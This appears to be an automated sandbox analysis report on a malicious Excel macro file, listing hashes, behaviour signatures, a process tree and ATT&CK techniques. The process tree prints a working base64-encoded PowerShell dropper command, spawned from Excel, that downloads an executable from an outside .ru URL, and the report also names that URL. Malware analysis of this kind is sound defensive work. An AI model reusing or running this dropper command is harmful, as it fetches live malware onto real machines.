Analysis

  • max time kernel
    71s
  • max time network
    20s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    15-04-2021 09:33

General

  • Target

    SOA.xlsm

  • Size

    18KB

  • MD5

    5af73df3782494331cb85c3278054f94

  • SHA1

    f4ddfd5507b0f92caec0588309d75292daa28693

  • SHA256

    eb065c4072ee30b3644a847c8f28044eb183977f39e1f90de08d098d8dd70eec

  • SHA512

    6ee5a826804664593d336a19c317e30f13f9d0d902f75bcef4668b30de08016e23a85575090248a376f5ac1afc36f13f17599b062dcf07da46eb3a8f732a4483

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://a0532749.xsph.ru/RR.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SOA.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1944
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQAwADUAMwAyADcANAA5AC4AeABzAHAAaAAuAHIAdQAvAFIAUgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBUAGUAbQBwACkAKwAnAFwAZABXAFEAWQBYAC4AZQB4AGUAJwApAA==
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:588
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQAwADUAMwAyADcANAA5AC4AeABzAHAAaAAuAHIAdQAvAFIAUgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBUAGUAbQBwACkAKwAnAFwAZABXAFEAWQBYAC4AZQB4AGUAJwApAA==
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1176
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYQAwADUAMwAyADcANAA5AC4AeABzAHAAaAAuAHIAdQAvAFIAUgAuAGUAeABlACcALAAoACQAZQBuAHYAOgBUAGUAbQBwACkAKwAnAFwAZABXAFEAWQBYAC4AZQB4AGUAJwApAA==
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:876

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/588-62-0x0000000000000000-mapping.dmp
  • memory/876-71-0x0000000004790000-0x0000000004791000-memory.dmp
    Filesize

    4KB

  • memory/876-75-0x000000007EF30000-0x000000007EF31000-memory.dmp
    Filesize

    4KB

  • memory/876-69-0x00000000046F2000-0x00000000046F3000-memory.dmp
    Filesize

    4KB

  • memory/876-70-0x0000000002490000-0x0000000002491000-memory.dmp
    Filesize

    4KB

  • memory/876-64-0x0000000000000000-mapping.dmp
  • memory/876-65-0x00000000760B1000-0x00000000760B3000-memory.dmp
    Filesize

    8KB

  • memory/876-66-0x0000000000A70000-0x0000000000A71000-memory.dmp
    Filesize

    4KB

  • memory/876-67-0x00000000047F0000-0x00000000047F1000-memory.dmp
    Filesize

    4KB

  • memory/876-89-0x00000000062C0000-0x00000000062C1000-memory.dmp
    Filesize

    4KB

  • memory/876-68-0x00000000046F0000-0x00000000046F1000-memory.dmp
    Filesize

    4KB

  • memory/876-88-0x00000000062A0000-0x00000000062A1000-memory.dmp
    Filesize

    4KB

  • memory/876-81-0x0000000006110000-0x0000000006111000-memory.dmp
    Filesize

    4KB

  • memory/876-74-0x0000000005FC0000-0x0000000005FC1000-memory.dmp
    Filesize

    4KB

  • memory/876-80-0x0000000006080000-0x0000000006081000-memory.dmp
    Filesize

    4KB

  • memory/1176-63-0x0000000000000000-mapping.dmp
  • memory/1944-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1944-59-0x000000002F8D1000-0x000000002F8D4000-memory.dmp
    Filesize

    12KB

  • memory/1944-60-0x0000000071141000-0x0000000071143000-memory.dmp
    Filesize

    8KB